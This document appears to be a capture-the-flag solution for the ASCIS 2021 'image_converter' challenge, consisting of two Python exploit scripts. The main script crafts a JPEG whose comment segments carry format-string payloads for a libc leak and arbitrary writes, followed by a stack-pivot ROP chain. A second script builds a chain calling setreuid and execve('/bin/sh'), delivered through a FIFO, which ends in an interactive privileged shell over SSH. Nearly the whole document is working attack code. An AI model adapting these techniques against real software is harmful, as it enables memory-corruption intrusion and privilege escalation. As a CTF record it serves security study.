ASCIS 2021 Qualification Round - image_converter
#!/usr/bin/env python3
import struct
import sys
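# Second stage: build the ROP chain the converter will read from /tmp/p.
# Usage: ex2.py <leaked libc pointer, hex>   (the leak comes from the %p
# format-string comment in the first stage).

# Distance from the leaked pointer to the libc base.
# NOTE(review): offset is specific to the challenge's libc build — confirm
# against the deployed libc before reusing this chain elsewhere.
libc_leak_offset = 0x270b3

# libc offsets (same caveat as above: tied to the challenge's libc build).
setreuid = 0x117ab0
execve = 0xe62f0
binsh = 0x1b75aa      # address of a "/bin/sh" string in libc, per the name
poprdx = 0x11c371     # pop rdx; pop r12; ret

# Gadgets in the main binary (fixed 0x40xxxx addresses, presumably non-PIE).
pop_rdi = 0x4019e3    # pop rdi; ret
pop_rsi = 0x401f20    # pop rsi; ret

# uid/gid handed to setreuid(); presumably the flag owner's id — verify on target.
target_uid = 1001


def p64(x: int) -> bytes:
    """Pack *x* as a little-endian unsigned 64-bit value.

    Raises struct.error if *x* is outside [0, 2**64).
    """
    return struct.pack('<Q', x)


def build_chain(libc: int) -> bytes:
    """Return the ROP chain for the given libc base address.

    The chain calls setreuid(target_uid, target_uid) and then
    execve(libc + binsh, NULL, NULL); rdx is zeroed through the
    `pop rdx; pop r12; ret` gadget, so the extra 0 feeds r12.
    """
    qwords = [
        pop_rdi, target_uid,
        pop_rsi, target_uid,
        libc + setreuid,
        pop_rdi, libc + binsh,
        pop_rsi, 0x0,
        libc + poprdx, 0x0, 0x0,   # rdx = NULL (envp), r12 = don't care
        libc + execve,
    ]
    return b''.join(p64(q) for q in qwords)


def main(argv: list[str]) -> None:
    """Parse the leaked pointer from argv and write the chain to /tmp/p.

    Exits with a usage message when the leak argument is missing; a
    non-hex argument raises ValueError from int().
    """
    if len(argv) != 2:
        sys.exit('usage: %s <leaked-libc-pointer-hex>' % argv[0])
    libc = int(argv[1], 16) - libc_leak_offset
    with open('/tmp/p', 'wb') as f:
        f.write(build_chain(libc))


if __name__ == '__main__':
    main(sys.argv)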
#!/usr/bin/env python3
from pwn import *
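# SSH session to the challenge box; everything below runs through it.
# NOTE(review): host and password are placeholders here. Do not commit real
# credentials in the script — read them from the environment or use key-based
# auth, and keep the password out of shell history and logs.
ss = ssh('ctf', 'ip', 20121, 'password')

# The libc offsets (setreuid, setregid, execve, "/bin/sh", pop rdx) are not
# used by this stage: the second-stage chain that needs them is built by
# ex2.py, which carries its own copy, so they are deliberately not repeated here.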
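def make_comment(comment: bytes) -> bytes:
    """Wrap *comment* in a JPEG COM segment: marker FF FE, big-endian length.

    The length field counts its own two bytes plus the payload, so the largest
    payload a segment can carry is 0xFFFD bytes. Raises ValueError for a longer
    payload rather than emitting a length that does not match the data.
    """
    import struct

    length = len(comment) + 2
    if length > 0xFFFF:
        raise ValueError(
            'JPEG comment payload too long for a 16-bit length field: %d bytes'
            % len(comment)
        )
    return b'\xff\xfe' + struct.pack('>H', length) + comment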
data = base64.b64decode('''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''')
with open('/tmp/x.jpg', 'wb') as f:
    # First-stage chain: the overflowed frame restores rbp/r12-r15 and then
    # returns into fopen. rbp receives the bytes "rb" (presumably used as the
    # fopen mode string — how it reaches fopen's argument is not visible here).
    stage1 = [
        b'rb'.ljust(8, b'\x00'),  # rbp
        p64(0x0),                 # r12
        p64(0x0),                 # r13
        p64(0x0),                 # r14
        p64(0x0),                 # r15
        p64(0x4011D0),            # fopen
        p64(0x4019E3),            # pop rdi; ret
        p64(0x432168),
        p64(0x405665),            # mov qword ptr [rdi + 0xc0], rax; ret
        p64(0x4019E3),            # pop rdi; ret
        p64(0x432200),
        p64(0x40E010),            # stbi__get8
        p64(0x401d85),            # pop rsp; ret  -> pivot
        p64(0x432238),
    ]
    rop = b''.join(stage1)

    # COM segments consumed by the converter's format-string path. The first
    # leaks a stack value (%175$p); the next three are write-what-where
    # payloads (format string padded to 124 bytes, then the two target
    # addresses referenced as args 139/140, padded to 128 with 'B'); the last
    # carries the "/tmp/p" path and the first-stage chain in the same layout.
    segments = [
        make_comment(b'\n%175$p\n'.ljust(135, b'\x00')),
        make_comment(
            b'%1$7344c%139$ln%1$58256c%140$hn'.ljust(124, b'\x00')
            + (p64(0x432210) + p64(0x432212)).ljust(128, b'B')
        ),
        make_comment(
            b'%1$1c%139$n%1$4095c%140$n'.ljust(124, b'\x00')
            + (p64(0x432230) + p64(0x432234)).ljust(128, b'B')
        ),
        make_comment(
            b'%1$31277c%139$ln%1$34324c%140$hn'.ljust(124, b'\x00')
            + (p64(0x432060) + p64(0x432062)).ljust(128, b'B')
        ),
        make_comment(b'/tmp/p'.ljust(124, b'\x00') + rop.ljust(128, b'B')),
    ]
    dat = b''.join(segments)

    # Splice the segments in front of the image's final two bytes
    # (presumably the EOI marker) so the rest of the file stays intact.
    f.write(data[:-2] + dat + data[-2:])
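ss.upload('/tmp/x.jpg', '/tmp/x.jpg')
ss.upload('ex2.py', '/tmp/ex2.py')
# /tmp/p is recreated as a FIFO: the converter's fopen of /tmp/p (from the
# first-stage chain) blocks until ex2.py opens it for writing, so the second
# stage can be generated after the libc leak is known.
ss.run_to_end('rm /tmp/p')
ss.run_to_end('mkfifo /tmp/p')
p = ss.system('CHECK_COM_INFO=1 /home/ctf/image_converter /tmp/x.jpg')
p.recvline()  # blank line emitted before the %p leak
# The leaked value is interpolated into a remote shell command. Parse it as
# hex first so that anything other than a bare pointer (stray output, or a
# line crafted by a hostile target) raises ValueError here instead of being
# executed by the shell; hex() re-emits only [0-9a-fx].
leak = int(p.recvline().decode('ascii').strip(), 16)
ss.run_to_end('python3 /tmp/ex2.py %s' % hex(leak))
ss.run_to_end('rm /tmp/p /tmp/x.jpg /tmp/ex2.py')
sleep(1)
p.clean()
# Presumably re-initialises the group after the setreuid() in the second
# stage; confirm against the target's uid/gid setup.
p.sendline(b'newgrp')
p.interactive('')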